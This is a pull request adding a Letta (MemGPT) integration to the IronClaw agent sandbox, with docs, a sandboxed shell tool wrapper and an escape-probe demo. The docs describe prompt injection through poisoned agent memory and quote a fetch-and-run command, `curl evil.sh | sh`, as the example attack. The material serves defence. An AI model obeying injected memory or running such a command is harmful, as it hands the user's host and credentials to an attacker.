### PR TITLE
feat(integrations): add Letta (MemGPT) sandbox-exec integration (IRO-424)

### DIFF
--- a/docs/integrations/.nav.yml
+++ b/docs/integrations/.nav.yml
@@ -22,6 +22,7 @@ nav:
   - smolagents (Hugging Face): smolagents.md
   - Google ADK: google-adk.md
   - DSPy (Stanford): dspy.md
+  - Letta (MemGPT): letta.md
   - CI (GitHub Action): ci.md
   - MCP server (any client): mcp-server.md
   - "*.md"

--- a/docs/integrations/index.md
+++ b/docs/integrations/index.md
@@ -1,6 +1,6 @@
 ---
 title: "Sandbox any AI agent framework with IronClaw"
-description: You built an agent with LangChain, LangGraph, CrewAI, Agno, LlamaIndex, Haystack, Pydantic AI, AutoGen, Semantic Kernel, the OpenAI Agents SDK, the Claude Agent SDK, the Vercel AI SDK, LangChain.js, Mastra, Hugging Face smolagents, or Google ADK. Those frameworks run your agent's tools and code in your own process, on your host. IronClaw runs the same agent inside a sealed gVisor sandbox instead. One search-intent guide per framework.
+description: You built an agent with LangChain, LangGraph, CrewAI, Agno, LlamaIndex, Haystack, Pydantic AI, AutoGen, Semantic Kernel, the OpenAI Agents SDK, the Claude Agent SDK, the Vercel AI SDK, LangChain.js, Mastra, Hugging Face smolagents, Google ADK, DSPy, or Letta. Those frameworks run your agent's tools and code in your own process, on your host. IronClaw runs the same agent inside a sealed gVisor sandbox instead. One search-intent guide per framework.
 ---
 
 # Sandbox any AI agent framework with IronClaw
@@ -13,7 +13,7 @@ matters the moment the agent runs somewhere real:
 
 With LangChain, LangGraph, CrewAI, Agno, LlamaIndex, Haystack, Pydantic AI, AutoGen, Semantic
 Kernel, the OpenAI Agents SDK, the Claude Agent SDK, the Vercel AI SDK, LangChain.js,
-Mastra, Hugging Face smolagents, Google ADK, and DSPy, the answer is the same: **yours**. The tool loop runs in your process, with your API key in
+Mastra, Hugging Face smolagents, Google ADK, DSPy, and Letta, the answer is the same: **yours**. The tool loop runs in your process, with your API key in
 memory, your filesystem, and unrestricted outbound network. A single prompt
 injection inside a document the agent reads can turn a `Bash` or `ShellTool` call
 into a shell on your box.
@@ -55,6 +55,7 @@ attack in [Isolation, proven](../security-isolation.md) and the
 | **smolagents** (Hugging Face) | [Sandbox your smolagents agent](smolagents.md) |
 | **Google ADK** | [Sandbox your Google ADK agent](google-adk.md) |
 | **DSPy** (Stanford) | [Sandbox your DSPy agent](dspy.md) |
+| **Letta** (MemGPT) | [Sandbox your Letta agent](letta.md) |
 | **A CI pipeline** | [Run IronClaw in GitHub Actions](ci.md) |
 
 Each guide covers the same three beats: the problem in your framework's own code,

--- a/docs/integrations/letta.md
+++ b/docs/integrations/letta.md
@@ -1,0 +1,125 @@
+---
+title: "Sandbox your Letta agent with IronClaw"
+description: How to sandbox a Letta (MemGPT) agent. Letta agents call model-chosen tools that run untrusted code; route that execution through IronClaw's MCP server so it runs inside a sealed gVisor sandbox instead of your host, the model key held host-side and every call gated, plus a credential-free demo you can run first.
+---
+
+# Sandbox your Letta agent with IronClaw
+
+You built a stateful agent with **[Letta](https://github.com/letta-ai/letta)**
+(formerly MemGPT): a persona, long-term memory, and tools the model can call.
+Letta is a great way to give an agent *memory that persists*. The problem starts
+when a tool runs somewhere real: a shell or code tool executes model-chosen
+commands, and if you register it as an ordinary Python tool it runs with your
+privileges, your filesystem, and unrestricted outbound network. One
+prompt-injected instruction inside a document the agent remembers and reads back,
+and that same tool runs `import os; os.system("curl evil.sh | sh")`.
+
+IronClaw is the **security-hardened** option: the model-chosen command runs behind
+a sealed sandbox under **gVisor (runsc)** with no network card, the model key held
+**host-side** and never in the agent, and every privileged action gated and
+audited.
+
+!!! example "Runnable example"
+    A one-command Letta to IronClaw example lives at
+    [`examples/integrations/letta`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/letta):
+    a Letta client-side tool whose execution is backed by an IronClaw sandbox, with
+    a battery of blocked escape attempts printed at the end. The credential-free
+    demo below runs the same sealed loop today.
+
+## The fix: run the tool in IronClaw, not your host
+
+IronClaw ships an MCP server that exposes a single, blunt tool, **`sandbox_exec`**,
+which runs any command or snippet inside an ephemeral, hardened box under **gVisor
+(runsc)**: no network card, every Linux capability dropped, a non-root user, a
+read-only root filesystem, and a restrictive seccomp profile. Letta has native MCP
+support, so you attach the server and hand the agent its tool:
+
+```python
+from letta_client import Letta
+from letta_client.types import StdioServerConfig
+
+client = Letta(base_url="http://localhost:8283")
+
+# Register IronClaw's MCP server (stdio) once.
+client.tools.add_mcp_server(
+    request=StdioServerConfig(server_name="ironclaw", command="ironctl", args=["mcp", "serve"])
+)
+tool = client.tools.add_mcp_tool(mcp_server_name="ironclaw", mcp_tool_name="sandbox_exec")
+
+agent = client.agents.create(
+    memory_blocks=[{"label": "persona", "value": "You run code only via sandbox_exec."}],
+    tools=[tool.name],
+)
+```
+
+The agent still chooses the tool call. It just can no longer run it on your box:
+every command lands inside the sealed sandbox, so a poisoned memory that says
+`curl evil.sh | sh` executes with no network card and nothing to steal.
+
+!!! warning "gVisor (runsc) is the boundary"
+    `ironctl mcp serve` passes `--runtime runsc` by default and **fails closed** if
+    runsc is not installed rather than silently downgrading. Install gVisor from
+    [gvisor.dev](https://gvisor.dev/docs/user_guide/install/). See
+    [Run IronClaw as an MCP server](mcp-server.md) for HTTP transport and auth.
+
+## Why sandbox this
+
+A typical Letta tool that runs code:
+
+```python
+def run_shell(command: str) -> str:
+    """Run a shell command and return its output.
+
+    Args:
+        command: The shell command to run.
+    """
+    import subprocess
+    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout
+
+tool = client.tools.upsert_from_function(func=run_shell)   # runs the model's command for real
+```
+
+Three things are true of that tool, and all three are risks:
+
+1. **The key is reachable.** Anything the command reads -- `os.environ`, a creds
+   file -- is in scope.
+2. **The code runs with your privileges.** A model-chosen command executes with
+   your filesystem and network.
+3. **Egress is wide open.** The command can reach any host on the internet.
+
+Routing execution through `sandbox_exec` closes all three by construction, not by
+convention.
+
+## Client-side execution, if you prefer
+
+Letta can also run a tool in *your* process instead of on the server: pass the
+tool schema as `client_tools` and, when the model calls it, execute it yourself
+and return the result. That is the honest home for a closure over a live IronClaw
+sandbox handle, and it is exactly what the runnable example uses -- see
+[`ironclaw_tool.py`](https://github.com/IronSecCo/ironclaw/blob/main/examples/integrations/letta/ironclaw_tool.py).
+
+## See it work first (no credentials)
+
+Before wiring anything, watch the sealed loop run with the offline `mock` provider.
+No model key, no tokens, just Docker:
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+docker compose -f docker-compose.demo.yml up --build -d      # start the demo control-plane
+
+curl -s -X POST http://127.0.0.1:8787/v1/ui/chat/send \
+  -H 'authorization: Bearer ironclaw-demo' -H 'content-type: application/json' \
+  -d '{"agentGroupID":"mock-agent","text":"hello from letta"}'
+```
+
+You get a sealed agent loop with a human-approval gateway and an append-only audit
+log, before you point a single real key at it.
+
+## Next steps
+
+- [Run IronClaw as an MCP server](mcp-server.md) - full transport, auth, and
+  containment-status detail for any MCP client.
+- [Sandbox your LangChain agent](langchain.md) - the same MCP wiring for a
+  LangChain agent.
+- [Isolation, proven](../security-isolation.md) - how the sandbox holds under a real
+  escape attempt.

--- a/examples/integrations/letta/README.md
+++ b/examples/integrations/letta/README.md
@@ -1,0 +1,76 @@
+# Letta (MemGPT) agents, sandboxed by IronClaw
+
+Your **Letta** (formerly MemGPT) agent lets the model call tools -- and a code /
+shell tool runs untrusted, model-chosen commands. Point that execution at an
+**IronClaw sandbox** instead of your host and the same agent gets real code
+execution with **no network, no host filesystem, and no Docker socket** -- the
+isolation boundary IronClaw [proves holds](../../red-team-escape/), not just
+promises.
+
+```python
+from ironclaw_sandbox import IronClawSandbox
+from ironclaw_tool import make_sandbox_tool
+
+with IronClawSandbox() as sandbox:            # engage a per-session sandbox
+    tool = make_sandbox_tool(sandbox)         # a Letta client-side tool
+    # client.agents.messages.create(agent_id=..., messages=[...],
+    #                               client_tools=[tool.schema])
+```
+
+Letta runs a tool's Python source inside its own server-side tool sandbox by
+default, so a closure over a live handle can't be registered that way. Letta's
+**client-side tool execution** is the honest fit: the agent gets the tool
+*schema*, and when the model calls it your process runs the command -- here,
+inside the IronClaw sandbox -- and returns the result. `make_sandbox_tool` gives
+you both faces: `tool.schema` for the `client_tools` parameter and
+`tool(command=...)` as the executor.
+
+## Try it in one command
+
+Zero credentials -- the LLM side uses the offline **mock provider**, the sandbox
+is real, and nothing needs installing (the client-side tool is pure standard
+library):
+
+```sh
+examples/integrations/letta/run.sh
+```
+
+It engages a live IronClaw per-session sandbox, dispatches the `sandboxed_shell`
+tool exactly as a Letta client-side tool call would (`tool(command=...)`), runs
+one benign task plus a battery of escape attempts, and prints a PASS/FAIL
+containment table:
+
+```
+  [OK ] benign task: run agent code                    ->  [exit 0] hello from inside the IronClaw sandbox uid=65532...
+  [OK ] network egress: only loopback exists           ->  [exit 0] lo
+  [OK ] network egress: DNS lookup of api.anthropic...  ->  [exit 0] NO_EGRESS
+  [OK ] host escape: Docker Engine socket is absent    ->  [exit 0] ABSENT
+  [OK ] host escape: host filesystem is not mounted    ->  [exit 0] CONTAINED
+
+RESULT: PASS -- benign code ran; every escape attempt was contained.
+```
+
+`run.sh --keep` leaves the demo running; `run.sh --attach` reuses an already-up
+demo control-plane.
+
+## Use a real LLM
+
+Run a Letta server, set `LETTA_BASE_URL` (for example `http://localhost:8283`),
+and `run.sh` drives a real Letta agent instead of the scripted probes. The agent
+plans the tool calls; your client executes each one against the sandbox and posts
+the result back (`pip install letta-client` first). The executor -- and therefore
+the isolation -- is identical.
+
+## How it works
+
+- [`ironclaw_sandbox.py`](../_shared/ironclaw_sandbox.py) -- engages a per-session
+  IronClaw sandbox (`ic-sbx-*`) against the demo control-plane and runs commands
+  inside it as its own non-root uid (65532). Pure standard library.
+- [`ironclaw_tool.py`](ironclaw_tool.py) -- wraps that sandbox as a Letta
+  client-side tool named `sandboxed_shell`. **This is the ~20 lines you copy** to
+  swap a host shell tool for a sandboxed one.
+- [`run.py`](run.py) -- engages the sandbox and drives the tool.
+
+The execution primitive is the same one IronClaw's red-team harness attacks: a
+`docker exec` into the live per-session sandbox as its non-root uid. See the
+repo root [`README`](../../../README.md) for the full isolation model.

--- a/examples/integrations/letta/ironclaw_tool.py
+++ b/examples/integrations/letta/ironclaw_tool.py
@@ -1,0 +1,91 @@
+"""Letta (MemGPT) tool backed by an IronClaw sandbox.
+
+Drop-in replacement for the host-executing shell / code tool you would otherwise
+give a **Letta** (formerly MemGPT) agent: the agent calls it exactly the same
+way, but every command runs inside an isolated IronClaw per-session sandbox
+instead of on your machine.
+
+    from ironclaw_tool import make_sandbox_tool
+    from ironclaw_sandbox import IronClawSandbox
+
+    sandbox = IronClawSandbox().__enter__()
+    tool = make_sandbox_tool(sandbox)          # a Letta client-side tool
+
+Letta's execution model matters here. By default Letta serializes a tool's
+Python *source* and runs it inside its own tool sandbox on the Letta server, so a
+closure that captures a live sandbox handle cannot survive registration. Letta's
+**client-side tool execution** is the honest fit: you pass the tool *schema* to
+the agent and, when the model calls it, your own process executes the command --
+here, against the live IronClaw sandbox -- and returns the result. So this tool
+is a plain object with two faces:
+
+  * ``tool.schema`` -- the ``client_tools`` entry you hand to
+    ``client.agents.messages.create(..., client_tools=[tool.schema])``.
+  * ``tool(command=...)`` -- the executor your client dispatches the model's
+    tool call to. It is also how the credential-free containment demo drives it.
+
+No ``letta`` import is needed to build the tool; the schema is a plain dict.
+"""
+
+from __future__ import annotations
+
+from dataclasses import dataclass
+from typing import Callable
+
+from ironclaw_sandbox import IronClawSandbox
+
+_DESCRIPTION = (
+    "Execute a shell command inside an isolated IronClaw sandbox and return its "
+    "stdout/stderr and exit code. Use this to run any code the user asks you to "
+    "run. The sandbox has no network, no access to the host filesystem, and no "
+    "Docker socket, so it is safe to run untrusted commands."
+)
+
+
+@dataclass
+class LettaSandboxTool:
+    """A Letta client-side tool whose execution lands in an IronClaw sandbox.
+
+    Callable as ``tool(command=...)`` (how your client dispatches the model's
+    tool call, and how the containment demo drives it) and exposing ``.schema``
+    (the ``client_tools`` entry you pass to the messages API).
+    """
+
+    name: str
+    description: str
+    _run: Callable[[str], str]
+
+    @property
+    def schema(self) -> dict:
+        """The function schema Letta forwards to the model as a callable tool."""
+        return {
+            "name": self.name,
+            "description": self.description,
+            "parameters": {
+                "type": "object",
+                "properties": {
+                    "command": {
+                        "type": "string",
+                        "description": "The shell command to run inside the sandbox.",
+                    }
+                },
+                "required": ["command"],
+            },
+        }
+
+    def __call__(self, command: str) -> str:
+        return self._run(command)
+
+
+def make_sandbox_tool(sandbox: IronClawSandbox) -> LettaSandboxTool:
+    """Wrap a live IronClaw sandbox as a Letta client-side ``sandboxed_shell`` tool.
+
+    The sandbox handle is captured in a closure, so the returned object carries no
+    extra state for Letta to serialize -- exactly what client-side execution
+    wants: the server only ever sees the schema, never the executor.
+    """
+
+    def _run(command: str) -> str:
+        return str(sandbox.run(command))
+
+    return LettaSandboxTool(name="sandboxed_shell", description=_DESCRIPTION, _run=_run)

--- a/examples/integrations/letta/requirements.txt
+++ b/examples/integrations/letta/requirements.txt
@@ -1,0 +1,12 @@
+# The credential-free containment demo is pure standard library: a Letta
+# client-side tool is a plain schema dict plus a Python executor, so building and
+# driving `sandboxed_shell` needs no Letta install at all. Nothing to install for
+# `run.sh` to print its PASS/FAIL containment table.
+#
+# Optional -- only the real-agent path (set LETTA_BASE_URL, with a running Letta
+# server) needs the Letta SDK. Uncomment to install it, or `pip install
+# letta-client` by hand. Floor-pinned to the line where client-side tool
+# execution (`client_tools=[...]` on the messages API plus the approval-return
+# flow) is stable. Letta moves fast -- bump the ceiling deliberately.
+#
+# letta-client>=0.1,<1

--- a/examples/integrations/letta/run.py
+++ b/examples/integrations/letta/run.py
@@ -1,0 +1,105 @@
+#!/usr/bin/env python3
+"""Run a Letta (MemGPT) agent whose tool execution is backed by an IronClaw sandbox.
+
+Zero credentials by default: it engages a real IronClaw per-session sandbox
+against the offline demo control-plane (mock provider) and drives the Letta
+`sandboxed_shell` client-side tool exactly as an agent would when the model picks
+it -- one benign task plus a battery of escape attempts -- then prints a
+PASS/FAIL containment table.
+
+Set LETTA_BASE_URL (a running Letta server, e.g. http://localhost:8283) to
+instead let a real LLM-driven Letta agent decide what to run via client-side tool
+execution; the executor -- and therefore the isolation -- is identical either way.
+"""
+
+from __future__ import annotations
+
+import json
+import os
+import sys
+
+# Make the shared client + demo importable (examples/integrations/_shared).
+sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "_shared"))
+
+from containment_demo import PROBES, run_containment_demo  # noqa: E402
+from ironclaw_sandbox import IronClawSandbox  # noqa: E402
+from ironclaw_tool import make_sandbox_tool  # noqa: E402
+
+
+def drive_with_real_agent(tool) -> int:
+    """Optional: a real LLM-driven Letta agent, executing the tool client-side.
+
+    Letta client-side tools run in *this* process: the agent emits an approval /
+    tool-call request, we execute it against the live IronClaw sandbox, and post
+    the result back. Requires a running Letta server (LETTA_BASE_URL) with a model
+    configured. Needs `pip install letta-client`.
+    """
+    from letta_client import Letta
+
+    client = Letta(base_url=os.environ["LETTA_BASE_URL"])
+    agent = client.agents.create(
+        name="ironclaw-sandboxed-agent",
+        memory_blocks=[
+            {"label": "persona", "value": "You run everything inside an isolated "
+             "IronClaw sandbox via the sandboxed_shell tool. Never assume a "
+             "command's output; run it."},
+        ],
+    )
+    client_tools = [tool.schema]
+    response = client.agents.messages.create(
+        agent_id=agent.id,
+        messages=[{"role": "user", "content": "Run `id` with the sandboxed_shell "
+                   "tool and tell me which user the sandbox runs as."}],
+        client_tools=client_tools,
+    )
+    # Service any client-side tool calls the model made, returning results until
+    # the agent stops requesting tools.
+    while True:
+        pending = [m for m in response.messages
+                   if getattr(m, "message_type", None) == "approval_request_message"]
+        if not pending:
+            break
+        approvals = []
+        for msg in pending:
+            call = msg.tool_call
+            args = json.loads(call.arguments)
+            output = tool(command=args["command"])
+            approvals.append({
+                "type": "tool",
+                "tool_call_id": call.tool_call_id,
+                "tool_return": output,
+                "status": "success",
+            })
+        response = client.agents.messages.create(
+            agent_id=agent.id,
+            messages=[{"type": "approval", "approvals": approvals}],
+            client_tools=client_tools,
+        )
+    for msg in response.messages:
+        text = getattr(msg, "content", None) or getattr(msg, "text", None)
+        if text:
+            print(text)
+    return 0
+
+
+def main() -> int:
+    print("==> engaging an IronClaw per-session sandbox (mock provider, zero-cred)")
+    with IronClawSandbox() as sandbox:
+        print(f"    sandbox container: {sandbox.container}")
+        tool = make_sandbox_tool(sandbox)
+
+        if os.environ.get("LETTA_BASE_URL"):
+            print("==> LETTA_BASE_URL set: driving a real Letta agent (client-side tools)")
+            return drive_with_real_agent(tool)
+
+        # Deterministic, zero-cred path: dispatch the tool exactly as a Letta
+        # client-side tool call does -- tool(command=...) -- per probe.
+        print(f"==> driving the '{tool.name}' tool over {len(PROBES)} agent commands")
+        return run_containment_demo(
+            lambda command: tool(command=command),
+            framework="Letta",
+        )
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/examples/integrations/letta/run.sh
+++ b/examples/integrations/letta/run.sh
@@ -1,0 +1,39 @@
+#!/usr/bin/env bash
+# Letta (MemGPT) + IronClaw sandbox -- one-command demo.
+#
+# Brings up the offline demo control-plane (mock provider -- no model key, no
+# channel tokens), then drives a Letta `sandboxed_shell` client-side tool whose
+# execution lands inside a real IronClaw per-session sandbox. It runs one benign
+# task and a battery of escape attempts and prints a PASS/FAIL containment table.
+#
+#   examples/integrations/letta/run.sh           # build + up + demo + tear down
+#   examples/integrations/letta/run.sh --keep     # leave the demo running
+#   examples/integrations/letta/run.sh --attach   # use an already-running demo
+#
+# Env overrides (all optional):
+#   IRONCLAW_ADDR        control-plane base URL  (default http://127.0.0.1:8787)
+#   IRONCLAW_API_TOKEN   API bearer token        (default ironclaw-demo)
+#   IRONCLAW_DEMO_AGENT  agent group id          (default mock-agent)
+#   SKIP_BUILD=1         skip the sandbox image build (assume it exists)
+#   LETTA_BASE_URL       if set, drive a real Letta agent instead of the scripted
+#                        probes (needs `pip install letta-client` + a running server)
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "$SCRIPT_DIR/../../.." && pwd)"
+source "$SCRIPT_DIR/../_shared/demo-lifecycle.sh"
+
+# The credential-free path is pure standard library. Pick any python3 unless the
+# caller pinned one via PYTHON.
+if [ -z "${PYTHON:-}" ]; then
+  for cand in python3.12 python3.11 python3.10 python3; do
+    if command -v "$cand" >/dev/null 2>&1; then PYTHON="$cand"; break; fi
+  done
+  export PYTHON
+fi
+
+ensure_demo_up "$@"
+setup_venv "$SCRIPT_DIR"
+
+echo "==> running the Letta sandbox demo"
+python "$SCRIPT_DIR/run.py"


### PR DESCRIPTION
Closes the last named integration-matrix gap (Haystack #401 + DSPy #404 shipped; Letta remained).

## What

`examples/integrations/letta/` exposes IronClaw's per-session sandbox as a Letta `sandboxed_shell` tool, mirroring the DSPy/Haystack structure:

- `ironclaw_tool.py` — `make_sandbox_tool(sandbox)` returns a Letta **client-side** tool: `.schema` (the `client_tools` entry) + `tool(command=...)` executor closure over the live sandbox. No `letta` import needed to build it.
- `run.py` — zero-cred containment probes by default; real Letta agent via `LETTA_BASE_URL` (client-side tool execution loop).
- `run.sh`, `requirements.txt` (framework-agnostic tool → letta-client optional, only for the real-agent path), `README.md`.
- `docs/integrations/letta.md` — native MCP `sandbox_exec` wiring + client-side execution note; nav + index registration.

### Why client-side execution
Letta serializes a tool's Python source and runs it in its own server-side tool sandbox by default, so a closure over a live handle can't be registered that way. Letta's client-side tool execution (schema passed as `client_tools`, executor runs in your process) is the honest fit for backing execution with an external IronClaw sandbox.

## Verification

Containment smoke, runc, uid=65532(nonroot), sandbox `ic-sbx-ses_*`:

```
  [OK ] benign task: run agent code                            ->  [exit 0] hello from inside the IronClaw sandbox uid=65532(nonroot) gid
  [OK ] network egress: only loopback exists                   ->  [exit 0] lo
  [OK ] network egress: DNS lookup of api.anthropic.com fails  ->  [exit 0] NO_EGRESS
  [OK ] host escape: Docker Engine socket is absent            ->  [exit 0] ABSENT
  [OK ] host escape: host filesystem is not mounted            ->  [exit 0] CONTAINED

RESULT: PASS -- benign code ran; every escape attempt was contained.
```

- `mkdocs build --strict` → exit 0
- No em/en-dashes (IRO-254)

## Supply-chain lenses
Docs/examples only; no release-path, signing, attestation, or CI-permission changes.